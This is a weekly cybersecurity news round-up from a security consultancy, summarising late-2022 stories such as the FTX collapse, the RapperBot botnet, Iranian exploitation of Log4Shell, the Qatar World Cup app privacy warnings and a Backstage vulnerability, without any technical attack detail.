Welcome to Ironshare’s Cyber Round-up, where we look back at the events of that last week and year to cover some of the news, posts, views, and highlights from the world of Security.
In this week’s round-up:
The well-publicised collapse of FTX has sparked many justified complaints from clients, who have suffered massive losses as a result. FTX founder, Sam Bankman-Fried, reportedly transferred $10 billion from the company over to a trading company called Alameda Research. This was done in secret by the founder, and approximately $1.7 billion of the client funds are currently unaccounted for. So far, SBF has not commented on the missing funds, but has stated he is working on “piecing together” the incident, and writing up a “more complete post on the play by play.”. This has been a huge headline this week, so I am sure we will hear more details on the situation soon.
By Reuters.com
Commons Speaker Sir Lindsay Hoyle has prompted all MPs to “avoid using their phones for sensitive conversations or even having it in the same room.”. This urgent warning comes after the hacking of Liz Truss’ phone last month; this attack saw sensitive information, intended for foreign officials, being obtained by threat actors. The MPs have been warned by the Speaker via a letter, while the government work on ways to increase security and implement new measures to counter the espionage attempts.
By BBC.co.uk
RapperBot, an adaptation of the Mirai malware botnet, has resurfaced and is being used as part of a new campaign. So far, the malware is being used to infect IoT devices, that are then partaking in DDoS attacks on certain game servers. This new variant of RapperBot differs slightly to what we are used to, and utilises a Telnet self-propagation mechanism, similar to the original Mirai malware. Telnet is a clear text, insecure, remote management protocol; ensuring that this is disabled across all devices, including IoT, is the best step in preventing infection.
By BleepingComputer.com
Iranian cyberspies have exploited Log4j to break into a US government network. The Iranian state-sponsored cyber criminals used a Log4j flaw to illegally mine for cryptocurrency, steal credentials and change passwords, and snoop around for several months undetected. On Wednesday an alert was posted where the US cybersecurity agency said it detected the advanced persistent threat (APT) activity on an unarmed federal civilian executive branch (FCEB) organization’s network in April. During the investigation, incident responders determined that the criminals gained initial access in February by exploiting Log4Shell. This is the vulnerability in the widely used Apache Log4j open-source logging library discovered back in November 2021. While the criminals had access, they installed XMRig on the server to mine cryptocurrency and then moved on to a VMware VDI-KMS host before downloading a Microsoft-signed tool for system administrators along with Mimikatz to steal credentials.
By TheRegister.com
Two World Cup apps reportedly pose serious privacy and security risks. European data protection regulators have been lining up to warn about the risks posed by Qatar’s World Cup apps for visitors. On Tuesday, Germany’s data protection commissioner said data collected by two Qatari apps that visitors are being asked to download “goes much further” than the apps’ privacy notices indicate. “One of the apps collects data on whether and with which number a telephone call is made.” And “The other app actively prevents the device on which it is installed from going into sleep mode. It is also obvious that the data used by the apps not only remain locally on the device but are also transmitted to a central server.”
By Politico.eu
Despite the guidance and best practice, an alarming proportion of businesses hit with ransomware simply pay to make it go away. It’s a problem that both cyber security officials and the wider industry are grappling with as they race to establish why businesses continue to pay ransoms, and how to fix this problem. In just one survey of many, Databarracks found that in response to a ransomware attack, 44% of organisations questioned admitted to paying up. Just 34% recovered from backups while a further 22% used ransomware decryption tools.
By ITPro.co.uk
A critical vulnerability has been found in Spotify’s Backstage. The flaw exists in “software templates”, a third-party module of the Backstage developer portal and has been given a CVSS score of 9.8. If leveraged, an attacker could potentially execute arbitrary commands on the application. This reportedly works by taking advantage of a vm2 sandbox escape that was discovered back in October. This flaw was patched in version 1.5.1 of Backstage.
By TheHackerNews.com
And that’s it for this week’s round-up, please do check in next week for our new batch of security news and posts.
Stay Safe, Secure and Healthy!
Edition #212 – 18th November 2022
Why not follow us on social media:
Stuart Hare is a Technologist with a passion for helping people in all aspects of IT & Cyber Security. Stuart is the Founder of Ironshare, an Information and Cyber Security company providing consultancy and managed services.
Samuel is a Security Analyst with Ironshare, an Information and Cyber Security company providing Security consultancy and managed services.
Joshua is working as a Managed Service Lead with Ironshare, an Information and Cyber Security company providing Security consultancy and managed services.